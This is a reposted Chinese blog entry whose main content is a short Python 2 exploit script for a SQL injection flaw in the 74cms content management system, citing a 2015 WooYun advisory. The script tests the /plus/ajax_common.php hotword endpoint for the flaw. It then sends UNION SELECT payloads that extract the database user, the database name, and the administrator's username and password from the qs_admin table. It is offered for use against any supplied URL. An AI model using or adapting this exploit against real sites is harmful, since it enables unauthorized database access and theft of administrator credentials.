74cms 注入exp
生活随笔
收集整理的這篇文章主要介紹了
74cms 注入exp
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
遇到就瞎寫了一個:
1 #!/usr/bin/env python 2 #encoding:utf-8 3 #by i3ekr 4 5 import requests,optparse,re 6 parse = optparse.OptionParser(usage="python %prog url") 7 parse.add_option('-u','--url',dest='url',metavar='urls',help='please input url!!!') 8 parse.set_defaults(v=1.2) 9 options,args=parse.parse_args() 10 url = options.url 11 12 13 def check(url): 14 payload = "/plus/ajax_common.php?query=0%27&act=hotword" 15 html = requests.get(url+payload).content 16 if "Query error" in html: 17 print """[+] 漏洞存在 18 [+] WooYun-2015-137002 19 [+] http://www.anquan.us/static/bugs/wooyun-2015-0137002.html 20 ------------------------------------------------------------- 21 """ 22 else: 23 print "[-] 漏洞不存在" 24 exit() 25 26 27 def attack(url): 28 user = requests.get(url+"/plus/ajax_common.php?query='+and+0+union+select+1,user(),3+and+'&act=hotword").content 29 print "[+] "+user 30 database = requests.get(url+"/plus/ajax_common.php?query='+and+0+union+select+1,database(),3+and+'&act=hotword").content 31 print "[+] "+database 32 username = requests.get(url+"/plus/ajax_common.php?query=0' union select 1,(select admin_name from qs_admin),3 and '&act=hotword").content 33 print "[+] "+username 34 password = requests.get(url+"/plus/ajax_common.php?query=0' union select 1,(select pwd from qs_admin),3 and '&act=hotword").content 35 print "[+] "+password 36 37 def ress(html): 38 res = r"\[\'(.*?)\'\]" 39 ok = re.findall(res,html)[0] 40 print ok 41 42 if __name__ == "__main__": 43 check(url) 44 attack(url)轉載于:https://www.cnblogs.com/nul1/p/9120264.html
創作挑戰賽新人創作獎勵來咯,堅持創作打卡瓜分現金大獎總結
以上是生活随笔為你收集整理的74cms 注入exp的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 涨姿势:Java 异常?尝试自定义异常
- 下一篇: python模块安装(xgboost)